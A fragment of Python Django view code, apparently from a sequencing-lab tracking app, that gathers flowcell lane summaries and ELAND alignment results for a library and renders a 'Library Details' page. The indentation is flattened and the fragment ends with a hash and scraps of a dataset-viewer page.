flowcell_run_results = {} # aka flowcells we're looking at
for lane in lib.lane_set.all():
fc = lane.flowcell
flowcell_id, id = parse_flowcell_id(fc.flowcell_id)
if flowcell_id not in flowcell_run_results:
flowcell_run_results[flowcell_id] = get_flowcell_result_dict(flowcell_id)
flowcell_list.append((fc.flowcell_id, lane.lane_number))
flowcell_list.sort()
lane_summary_list = []
eland_results = []
for fc, lane_number in flowcell_list:
lane_summary, err_list = _summary_stats(fc, lane_number, lib_id)
lane_summary_list.extend(lane_summary)
eland_results.extend(_make_eland_results(fc, lane_number, flowcell_run_results))
context = {
'page_name': 'Library Details',
'lib': lib,
'eland_results': eland_results,
'lane_summary_list': lane_summary_list,
}
context.update(SAMPLES_CONTEXT_DEFAULTS)
return render(request, 'samples/library_detail.html', context)
|
493a0ababcb9da6bffd859044ac0a11e854b03d5
| 20,199 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.